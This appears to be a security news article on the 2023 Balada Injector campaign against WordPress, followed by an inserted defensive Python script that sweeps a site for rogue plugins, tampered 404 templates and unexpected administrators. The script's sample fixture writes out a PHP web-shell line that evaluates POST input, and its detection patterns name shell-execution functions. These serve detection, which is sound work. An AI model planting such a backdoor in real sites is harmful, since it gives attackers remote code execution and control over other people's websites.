Massive Balada Injector Attack Targets WordPress Sites in September 2023


In September 2023, a large-scale campaign using the Balada Injector malware compromised more than 17,000 WordPress websites, almost double the number seen the month before.

The attackers exploited a publicly disclosed plugin vulnerability, showing how many sites were still running the unpatched version weeks after the fix was available.

This news item delves into the details of this attack and its implications.

Key Takeaways:

  • Widespread Compromises: Over 17,000 WordPress websites fell victim to the Balada Injector attack in September 2023, which exploited security vulnerabilities to gain access to these sites.
  • Vulnerable Plugin Exploited: Approximately 9,000 of the compromised websites were infiltrated through a recently disclosed flaw in the tagDiv Composer plugin (CVE-2023-3169). The flaw let unauthenticated attackers store a malicious script on the site so that it executes in the browser of anyone who views the affected page, including site administrators (stored cross-site scripting, XSS).
  • Balada Injector Campaign: Balada Injector is an ongoing large-scale operation discovered in December 2022. It exploits WordPress plugin vulnerabilities to deploy a Linux backdoor on affected systems, ultimately redirecting users to malicious content.

The Balada Injector Attack

In September 2023, more than 17,000 WordPress websites fell victim to a major cyberattack conducted using the Balada Injector malware.

This attack was notable because it represented almost twice the number of compromises compared to the previous month.


Plugin Vulnerability Exploited

Of the compromised websites, around 9,000 were breached by exploiting a recently disclosed security flaw in the tagDiv Composer plugin, identified as CVE-2023-3169 with a CVSS score of 6.1.

This vulnerability let unauthenticated attackers carry out stored cross-site scripting (XSS) attacks: the injected script is saved on the server and served to every visitor of the affected page.

Targeting tagDiv’s Premium Themes

The Balada Injector gang has a history of targeting vulnerabilities in tagDiv’s premium themes.

In a campaign dating back to the summer of 2017, disclosed security flaws in Newspaper and Newsmag WordPress themes were actively exploited.

Balada Injector Campaign Overview

The Balada Injector campaign, first discovered in December 2022, involves threat actors exploiting various WordPress plugin vulnerabilities to deploy a Linux backdoor on vulnerable systems.

The primary objective of this operation is to direct users of compromised websites to fraudulent tech support pages, deceptive lottery scams, and push notification fraud.

The campaign has impacted over a million websites since 2017.

Recurring Attack Waves

The Balada Injector attacks arrive in recurring waves every few weeks. A wave typically starts over the weekend, and the largest spike in new infections is usually detected on the following Tuesday.

Exploiting Vulnerabilities

The September breaches exploited CVE-2023-3169 to inject a malicious script into the affected sites' pages.

Once that script ran, the attackers established persistent access by uploading backdoors, adding malicious plugins, and creating rogue administrator accounts, so that patching the plugin alone no longer removed them from the site.

Complex Attack Techniques

Balada Injector’s attack scripts have continually evolved. They have shown the ability to plant backdoors in websites’ 404 error pages, enabling the execution of arbitrary PHP code.

Alternatively, the injected scripts carry code that automatically installs a malicious plugin named wp-zexit.

To do so, the script drives the WordPress admin interface the way a legitimate administrator would, reproducing the whole process of uploading a plugin as a ZIP archive and activating it.

Sophisticated Malware

Newer attack waves, observed in late September 2023, incorporated randomized code injections to download and execute a second-stage malware from a remote server, installing the wp-zexit plugin.

Additionally, obfuscated scripts were employed to transmit visitor cookies to a controlled URL, receiving unspecified JavaScript code in return.

Shift in Attack Methods

In the most recent attacks, the threat actors no longer relied on exploiting the tagDiv Composer vulnerability directly. Instead they used the backdoors and malicious admin users they had created earlier by targeting logged-in website administrators, so sites that patched the plugin without removing these artifacts remained compromised.
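A defender's sweep for the persistence artifacts this article names, added here as an example and not code from Sucuri, tagDiv or the article: it checks a WordPress document root for a wp-zexit plugin directory, flags theme 404.php templates that contain code able to execute request-supplied PHP, and compares the administrators reported by `wp user list --role=administrator --format=csv` against an allowlist of known accounts. The regex heuristics, the sample site it builds in a temporary directory and the sample user listing are constructed for illustration; they are generic PHP-backdoor indicators, not Balada-specific signatures.

```python
"""Sweep a WordPress install for the persistence artifacts described above.

Added example, not code from Sucuri or the article. The regexes, the sample
site and the sample user listing are constructed for illustration; the
patterns are generic PHP-backdoor heuristics, not Balada-specific signatures.
"""
import csv
import io
import re
import tempfile
from pathlib import Path

# A theme's 404.php should contain markup and template tags only. Any of
# these constructs in it deserves a manual diff against a clean copy.
SUSPICIOUS_PHP = [
    re.compile(r"\b(?:eval|assert|system|passthru|shell_exec|create_function)\s*\("),
    re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b"),
]

# Plugin directory names the article associates with the campaign
# (assumption: other names may be used; extend this tuple as needed).
ROGUE_PLUGIN_NAMES = ("wp-zexit",)


def scan_404_templates(wp_root: Path) -> list[tuple[str, str]]:
    """Return (relative path, first suspicious token) for every
    wp-content/themes/*/404.php under wp_root that matches a heuristic."""
    hits = []
    for tpl in sorted((wp_root / "wp-content" / "themes").glob("*/404.php")):
        text = tpl.read_text(errors="replace")
        for rx in SUSPICIOUS_PHP:
            m = rx.search(text)
            if m:
                hits.append((tpl.relative_to(wp_root).as_posix(), m.group(0)))
                break
    return hits


def find_rogue_plugins(wp_root: Path, names=ROGUE_PLUGIN_NAMES) -> list[str]:
    """Return the rogue plugin directories present under wp-content/plugins."""
    plugins = wp_root / "wp-content" / "plugins"
    return [n for n in names if (plugins / n).exists()]


def unexpected_admins(wp_cli_csv: str, allowlist: set[str]) -> list[dict]:
    """Parse `wp user list --role=administrator --format=csv` output and
    return the rows whose user_login is not on the allowlist."""
    rows = csv.DictReader(io.StringIO(wp_cli_csv))
    return [r for r in rows if r["user_login"] not in allowlist]


def run_sweep(wp_root: Path, wp_cli_csv: str, allowlist: set[str]) -> dict:
    """Combine the three checks into one report."""
    return {
        "rogue_plugins": find_rogue_plugins(wp_root),
        "tampered_404": scan_404_templates(wp_root),
        "unexpected_admins": unexpected_admins(wp_cli_csv, allowlist),
    }


# ---- constructed sample input (not real site data) ----------------------
SAMPLE_USER_LIST = """ID,user_login,display_name,user_email,user_registered,roles
1,editor_jane,Jane,jane@example.com,2019-03-04 10:11:12,administrator
57,backup_svc,backup_svc,noreply@example.net,2023-09-26 03:14:59,administrator
"""


def build_sample_site(base: Path) -> Path:
    """Lay out a minimal wp-content with one clean theme, one theme whose
    404.php carries a request-driven eval, and the rogue plugin directory."""
    clean = base / "wp-content" / "themes" / "clean-theme"
    clean.mkdir(parents=True)
    (clean / "404.php").write_text(
        "<?php get_header(); ?>\n<h1>Page not found</h1>\n<?php get_footer(); ?>\n"
    )
    tampered = base / "wp-content" / "themes" / "news-theme"
    tampered.mkdir(parents=True)
    (tampered / "404.php").write_text(
        "<?php get_header(); ?>\n<h1>Page not found</h1>\n"
        "<?php if (isset($_POST['k'])) { @eval(base64_decode($_POST['k'])); } ?>\n"
        "<?php get_footer(); ?>\n"
    )
    (base / "wp-content" / "plugins" / "wp-zexit").mkdir(parents=True)
    (base / "wp-content" / "plugins" / "akismet").mkdir(parents=True)
    return base


def demo() -> dict:
    """Build the sample site in a temp dir, sweep it and return the report."""
    with tempfile.TemporaryDirectory() as d:
        return run_sweep(build_sample_site(Path(d)), SAMPLE_USER_LIST, {"editor_jane"})


if __name__ == "__main__":
    for finding, items in demo().items():
        print(f"{finding}: {items}")
```

On a real site, point `run_sweep` at the document root and feed it the output of `wp user list --role=administrator --format=csv` instead of the sample. A 404.php hit is a lead, not a verdict: diff the file against a clean copy of the same theme version before deleting anything, because some commercial themes do include PHP logic in their templates. Finding a rogue admin or backdoor means patching tagDiv Composer is not enough; the accounts and files must be removed and every administrator's password and session reset.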

Conclusion

The massive Balada Injector attack in September 2023 highlights the persistent threat to WordPress websites.

As threat actors adapt their tactics, website administrators and owners must remain vigilant, applying security patches promptly and employing robust security measures to safeguard their sites.

About WordPress: WordPress is a widely used content management system, and Balada Injector is a long-running malware campaign that targets vulnerabilities in WordPress plugins and themes. Sucuri, a website security company, is among the organizations that monitor and report on the campaign.
